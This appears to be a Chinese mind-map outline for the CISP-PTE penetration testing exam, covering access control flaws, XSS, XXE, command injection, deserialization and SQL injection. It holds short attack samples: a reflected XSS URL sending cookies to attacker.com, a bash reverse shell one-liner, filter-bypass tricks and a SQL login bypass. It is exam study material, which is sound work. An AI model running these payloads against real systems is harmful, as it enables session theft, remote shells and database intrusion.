CISP-PTE思维脑图
2023-06-21 10:22:29 1 举报
AI智能生成
CISP- PTE考试脑图整理
作者其他创作
大纲/内容
越权漏洞
攻击方法
唯一性数据修改,包括手机号、身份证
订单ID、商品ID修改
方式
纵向越权
横向越权
修复方法
鉴权
服务端对于请求的数据和当前用户做校验
id使用随机数
逻辑漏洞
支付漏洞
接口漏洞
cookie漏洞
cookie仿冒
会话固定攻击
登陆漏洞
登陆认证绕过
双因素认证
验证码绕过
验证码轰炸
密码找回漏洞
XSS漏洞
跨站脚本攻击
目标是获取用户的cookie或者session
反弹型
假设我们有一个电子商务网站,该网站在显示产品搜索结果时未对用户输入进行适当的验证或编码。一个正常的搜索URL可能看起来像这样:
`http://www.example.com/search?q=手机`
现在,攻击者构造了一个包含恶意JavaScript代码的搜索URL,比如:
`http://www.example.com/search?q=<script>document.location='http://www.attacker.com/steal.php?cookie='+document.cookie</script>`
然后,攻击者将这个恶意URL通过电子邮件、社交媒体或其他方式发送给受害者。如果受害者点击这个链接,搜索页面就会将JavaScript代码反射回用户的浏览器,并执行它。
这段恶意脚本会获取用户的cookie,并将其发送到攻击者控制的网站。攻击者可以使用这些cookie来冒充用户,访问他们的账户,购物,或进行其他可能的恶意活动。
存储型
XXE漏洞
XXE攻击指的是XML外部实体注入攻击(XML External Entity Injection),是一种常见的Web应用程序漏洞攻击
命令执行RCE
代码审计命令执行
执行命令页面
命令
${}
eval
assert
preg_replace()
create_function()
shell_exec()
管道符
;
隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。
|
上一条命令的输出,作为下一条命令参数
&
并行执行,
后台执行
&&
逻辑与
左边的执行正确才会执行右边的
||
逻辑或
左边的执行错误才会执行右边的
?
?可以替代任何字符
绕过方法
cat${IFS}1.txt
cat$IFS$91.txt
cat<1.txt
cat<>flag.txt
bypass绕过
没有回显
msf反向回连
|bash -i >& /dev/tcp/8.8.8.8/8080 0>&1
dnslog管道解析
反序列化
定义
序列化:把对象转换成字节序列的过程
反序列化:把子节转换成对象
用途
保存
传输
php
serialize
unserialize
分支主题
方法
有的题目结合sql注入考察反序列化漏洞,通过sql注入得到数据,发现某个值是序列化存储的。那么就要注意这个序列化的值在哪里被拿出来反序列化利用,再在那个利用点进行分析,构造序列化payload
注意php魔术方法,因为php的反序列化漏洞都和魔术方法挂钩,因为魔术方法的使用不当才导致了可以反序列化我们想要的值
反序列化漏洞配合代码审计,注意unserialize的位置,以及我们可控的参数,然后构造出可以出flag的payload
HTTP
请求头域
user_agent
X-Forwarded- For
referer
POST
POST数据不能有空格
编码
ascii码
工具?
URL编码
%
ascii码16进制
base64编码
=作为填充字符
Subtopic 4
SQL注入
SQL
SQL运算符优先级
6.and
7.or
执行顺序
from先执行
万能密钥
‘ or 1=‘1
sqlmap
类型
sql报错
updata XML
必须是xpath
count(*),rand(),group by
联合注入
sql盲注
页面没有回显,但是条件错了和对了,返回不一样
时间盲注
布尔盲注
宽子节注入
二次注入
cookie注入
绕过bypass
特殊字符
0x3a是十六进制的“:”
空格绕过
注释符/**/
%a0
括号绕过空格
双写
引号绕过
使用16进制
逗号绕过
比较符绕过
greatest(),least()
between and
注释符绕过
#
-- -
=绕过
like,regexp
union、select、where
双写Uniounionn
大小写 UniOn
U/**/Nion/**/SE
思路:先寻找注入点,后想办法绕过
文件上传
Subtopic 1
文件包含
基础知识
网络知识
二层交换机端口没有MAC地址
企业SRC平台
收藏
0 条评论
下一页